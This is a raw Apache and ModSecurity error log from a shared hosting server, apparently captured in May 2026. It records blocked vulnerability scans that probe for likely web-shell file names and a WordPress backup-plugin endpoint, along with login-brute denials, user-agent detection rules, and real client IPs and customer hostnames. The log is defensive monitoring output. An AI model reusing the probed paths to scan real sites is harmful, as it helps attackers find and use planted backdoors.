[Tue May 26 15:11:50.147734 2026] [lsapi:error] [pid 686593:tid 686838] [client 66.249.64.40:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 15:11:50.147992 2026] [lsapi:error] [pid 686593:tid 686814] [client 74.7.243.210:0] [host billing.mosykay.com] Connect to backend failed with CONNECTION_RESET on sending request(GET /?path=//sys/bus/node/devices/node0/cpu4/node0/memory118/subsystem/devices/memory11/node0/memory362 HTTP/1.1); uri(/?path=//sys/bus/node/devices/node0/cpu4/node0/memory118/subsystem/devices/memory11/node0/memory362): ReceiveAckHdr: backend reset connection: errno 104 (possibly memlimit for LVE ID 1035 with UID 1035 too small), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html, referer: https://billing.mosykay.com/?path=//sys/bus/node/devices/node0/cpu4/node0/memory118/subsystem/devices/memory11/node0
[Tue May 26 15:11:50.358686 2026] [security2:error] [pid 686593:tid 686748] [client 154.16.226.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVq3uilgkZcvx0_tl-yUwAAAJ4"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1429934&moderation-hash=d5f6669a8e063df5ec07d128d30da23b
[Tue May 26 15:11:52.289513 2026] [security2:error] [pid 686593:tid 686800] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq3uilgkZcvx0_tl-yXQAAANI"]
[Tue May 26 15:11:52.693076 2026] [security2:error] [pid 686593:tid 686832] [client 91.214.76.74:60546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.76.214.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "enattafoodparcel.org.thedebateafrica.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVq4OilgkZcvx0_tl-yxgAAAPI"], referer: http://enattafoodparcel.org.thedebateafrica.org/wp-json/wp/v2/give_forms/
[Tue May 26 15:11:53.293416 2026] [proxy:error] [pid 686593:tid 686629] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:11:53.293467 2026] [proxy_http:error] [pid 686593:tid 686629] [remote 45.148.10.204:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:11:53.294099 2026] [proxy:error] [pid 686593:tid 686629] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:11:53.294136 2026] [proxy_http:error] [pid 686593:tid 686629] [remote 45.148.10.204:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:11:53.817662 2026] [security2:error] [pid 686593:tid 686847] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq4eilgkZcvx0_tl-y4QAAAQE"]
[Tue May 26 15:11:55.281550 2026] [security2:error] [pid 686593:tid 686830] [client 85.121.240.156:48626] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVq4eilgkZcvx0_tl-y7wAAAPA"]
[Tue May 26 15:11:57.316826 2026] [security2:error] [pid 686593:tid 686743] [client 68.179.186.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq5OilgkZcvx0_tl-zUAAAAJk"]
[Tue May 26 15:11:57.951931 2026] [security2:error] [pid 686593:tid 686760] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq5eilgkZcvx0_tl-zagAAAKo"]
[Tue May 26 15:11:59.066257 2026] [security2:error] [pid 686593:tid 686792] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq5uilgkZcvx0_tl-zggAAAMo"]
[Tue May 26 15:12:00.088982 2026] [security2:error] [pid 686593:tid 686814] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq5-ilgkZcvx0_tl-zlwAAAOA"]
[Tue May 26 15:12:02.462898 2026] [security2:error] [pid 686593:tid 686800] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq6uilgkZcvx0_tl-z4AAAANI"]
[Tue May 26 15:12:04.422268 2026] [security2:error] [pid 686593:tid 686775] [client 188.130.142.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVq7OilgkZcvx0_tl-0HQAAALk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:12:04.590024 2026] [security2:error] [pid 686593:tid 686840] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq7OilgkZcvx0_tl-0GAAAAPo"]
[Tue May 26 15:12:06.248209 2026] [security2:error] [pid 686593:tid 686805] [client 188.130.142.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVq7uilgkZcvx0_tl-0XwAAANc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1233142&moderation-hash=2149247dd3761dbb64efdb34ded08f44
[Tue May 26 15:12:06.643578 2026] [security2:error] [pid 686593:tid 686811] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq7uilgkZcvx0_tl-0YgAAAN0"]
[Tue May 26 15:12:06.671751 2026] [security2:error] [pid 686593:tid 686739] [client 65.109.104.153:63930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.104.109.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVq7uilgkZcvx0_tl-0ZwAAAJU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:12:08.100993 2026] [security2:error] [pid 686593:tid 686805] [client 2a06:98c0:3600::103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahVq7-ilgkZcvx0_tl-0lQAAANc"]
[Tue May 26 15:12:08.730021 2026] [security2:error] [pid 686593:tid 686777] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq8OilgkZcvx0_tl-0twAAALs"]
[Tue May 26 15:12:09.233984 2026] [security2:error] [pid 686593:tid 686604] [remote 2a06:98c0:3600::103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVq8OilgkZcvx0_tl-00wAArwo"]
[Tue May 26 15:12:09.938897 2026] [security2:error] [pid 686593:tid 686815] [client 34.66.224.20:36478] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "ahVq8eilgkZcvx0_tl-1AQAAAOE"]
[Tue May 26 15:12:10.075337 2026] [security2:error] [pid 686593:tid 686813] [client 34.66.224.20:36492] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/backup-backup/includes/T"] [unique_id "ahVq8uilgkZcvx0_tl-1AwAAAN8"]
[Tue May 26 15:12:11.363571 2026] [security2:error] [pid 686593:tid 686740] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq8uilgkZcvx0_tl-1HgAAAJY"]
[Tue May 26 15:12:13.172915 2026] [security2:error] [pid 686593:tid 686846] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq9OilgkZcvx0_tl-1XAAAAQA"]
[Tue May 26 15:12:14.308335 2026] [security2:error] [pid 686593:tid 686849] [client 114.119.131.206:37413] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVq9uilgkZcvx0_tl-1jQAAAQM"], referer: http://haddingtonwines.com/cart?remove_item=ef35613fc5fa4c4c512d552533f5e6f2
[Tue May 26 15:12:14.609403 2026] [security2:error] [pid 686593:tid 686786] [client 104.43.242.179:9776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVq9uilgkZcvx0_tl-1nwAAAMQ"]
[Tue May 26 15:12:14.609606 2026] [security2:error] [pid 686593:tid 686786] [client 104.43.242.179:9776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVq9uilgkZcvx0_tl-1nwAAAMQ"]
[Tue May 26 15:12:15.335944 2026] [security2:error] [pid 686593:tid 686732] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq9uilgkZcvx0_tl-1qAAAAI4"]
[Tue May 26 15:12:16.778940 2026] [security2:error] [pid 686593:tid 686724] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq-OilgkZcvx0_tl-13wAAAIY"]
[Tue May 26 15:12:17.404735 2026] [security2:error] [pid 686593:tid 686791] [client 173.239.254.144:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVq-OilgkZcvx0_tl-17AAAySA"]
[Tue May 26 15:12:17.879511 2026] [security2:error] [pid 686593:tid 686826] [client 188.130.142.12:42691] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVq-eilgkZcvx0_tl-2AAAAAOw"], referer: https://anujtradingco.com
[Tue May 26 15:12:18.065468 2026] [security2:error] [pid 686593:tid 686751] [client 104.43.242.179:20940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/x.php"] [unique_id "ahVq-uilgkZcvx0_tl-2EgAAAKE"]
[Tue May 26 15:12:18.065585 2026] [security2:error] [pid 686593:tid 686751] [client 104.43.242.179:20940] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/x.php"] [unique_id "ahVq-uilgkZcvx0_tl-2EgAAAKE"]
[Tue May 26 15:12:19.075314 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:51312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wpconf.php"] [unique_id "ahVq--ilgkZcvx0_tl-2NgAAALM"]
[Tue May 26 15:12:19.075482 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:51312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wpconf.php"] [unique_id "ahVq--ilgkZcvx0_tl-2NgAAALM"]
[Tue May 26 15:12:19.834417 2026] [security2:error] [pid 686593:tid 686805] [client 104.43.242.179:48816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/aaf.php"] [unique_id "ahVq--ilgkZcvx0_tl-2WAAAANc"]
[Tue May 26 15:12:19.834587 2026] [security2:error] [pid 686593:tid 686805] [client 104.43.242.179:48816] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/aaf.php"] [unique_id "ahVq--ilgkZcvx0_tl-2WAAAANc"]
[Tue May 26 15:12:19.860135 2026] [security2:error] [pid 686593:tid 686723] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq--ilgkZcvx0_tl-2TQAAAIU"]
[Tue May 26 15:12:20.298359 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:37352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wander.php"] [unique_id "ahVq_OilgkZcvx0_tl-2agAAALM"]
[Tue May 26 15:12:20.298460 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:37352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wander.php"] [unique_id "ahVq_OilgkZcvx0_tl-2agAAALM"]
[Tue May 26 15:12:20.445542 2026] [security2:error] [pid 686593:tid 686759] [client 45.132.227.34:58297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVq_OilgkZcvx0_tl-2ZwAAAKk"]
[Tue May 26 15:12:20.748767 2026] [security2:error] [pid 686593:tid 686809] [client 104.43.242.179:32109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/gptsh.php"] [unique_id "ahVq_OilgkZcvx0_tl-2fgAAANs"]
[Tue May 26 15:12:20.748872 2026] [security2:error] [pid 686593:tid 686809] [client 104.43.242.179:32109] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/gptsh.php"] [unique_id "ahVq_OilgkZcvx0_tl-2fgAAANs"]
[Tue May 26 15:12:21.110453 2026] [security2:error] [pid 686593:tid 686837] [client 104.43.242.179:34018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/xocx.php"] [unique_id "ahVq_eilgkZcvx0_tl-2hgAAAPc"]
[Tue May 26 15:12:21.110533 2026] [security2:error] [pid 686593:tid 686837] [client 104.43.242.179:34018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/xocx.php"] [unique_id "ahVq_eilgkZcvx0_tl-2hgAAAPc"]
[Tue May 26 15:12:21.435960 2026] [security2:error] [pid 686593:tid 686793] [client 104.43.242.179:32412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/155.php"] [unique_id "ahVq_eilgkZcvx0_tl-2mAAAAMs"]
[Tue May 26 15:12:21.436060 2026] [security2:error] [pid 686593:tid 686793] [client 104.43.242.179:32412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/155.php"] [unique_id "ahVq_eilgkZcvx0_tl-2mAAAAMs"]
[Tue May 26 15:12:21.859440 2026] [security2:error] [pid 686593:tid 686733] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq_eilgkZcvx0_tl-2lwAAAI8"]
[Tue May 26 15:12:22.481476 2026] [security2:error] [pid 686593:tid 686782] [client 104.43.242.179:46393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/colay.php"] [unique_id "ahVq_uilgkZcvx0_tl-2tAAAAMA"]
[Tue May 26 15:12:22.481572 2026] [security2:error] [pid 686593:tid 686782] [client 104.43.242.179:46393] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/colay.php"] [unique_id "ahVq_uilgkZcvx0_tl-2tAAAAMA"]
[Tue May 26 15:12:23.553811 2026] [security2:error] [pid 686593:tid 686829] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVq_-ilgkZcvx0_tl-20QAAAO8"]
[Tue May 26 15:12:24.219838 2026] [security2:error] [pid 686593:tid 686837] [client 104.43.242.179:40688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/hly.php"] [unique_id "ahVrAOilgkZcvx0_tl-29gAAAPc"]
[Tue May 26 15:12:24.219959 2026] [security2:error] [pid 686593:tid 686837] [client 104.43.242.179:40688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/hly.php"] [unique_id "ahVrAOilgkZcvx0_tl-29gAAAPc"]
[Tue May 26 15:12:24.942797 2026] [security2:error] [pid 686593:tid 686813] [client 104.43.242.179:34028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/ppp.php"] [unique_id "ahVrAOilgkZcvx0_tl-3DQAAAN8"]
[Tue May 26 15:12:24.942898 2026] [security2:error] [pid 686593:tid 686813] [client 104.43.242.179:34028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/ppp.php"] [unique_id "ahVrAOilgkZcvx0_tl-3DQAAAN8"]
[Tue May 26 15:12:26.045377 2026] [security2:error] [pid 686593:tid 686744] [client 104.43.242.179:33998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/201.php"] [unique_id "ahVrAuilgkZcvx0_tl-3NgAAAJo"]
[Tue May 26 15:12:26.045462 2026] [security2:error] [pid 686593:tid 686744] [client 104.43.242.179:33998] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/201.php"] [unique_id "ahVrAuilgkZcvx0_tl-3NgAAAJo"]
[Tue May 26 15:12:26.110276 2026] [security2:error] [pid 686593:tid 686845] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrAeilgkZcvx0_tl-3JwAAAP8"]
[Tue May 26 15:12:27.298461 2026] [security2:error] [pid 686593:tid 686737] [client 123.22.124.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrAuilgkZcvx0_tl-3SAAAAJM"]
[Tue May 26 15:12:27.395477 2026] [security2:error] [pid 686593:tid 686833] [client 104.43.242.179:43103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/ops.php"] [unique_id "ahVrA-ilgkZcvx0_tl-3WwAAAPM"]
[Tue May 26 15:12:27.395580 2026] [security2:error] [pid 686593:tid 686833] [client 104.43.242.179:43103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/ops.php"] [unique_id "ahVrA-ilgkZcvx0_tl-3WwAAAPM"]
[Tue May 26 15:12:27.914920 2026] [security2:error] [pid 686593:tid 686809] [client 104.43.242.179:27227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/samll.php"] [unique_id "ahVrA-ilgkZcvx0_tl-3bAAAANs"]
[Tue May 26 15:12:27.915007 2026] [security2:error] [pid 686593:tid 686809] [client 104.43.242.179:27227] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/samll.php"] [unique_id "ahVrA-ilgkZcvx0_tl-3bAAAANs"]
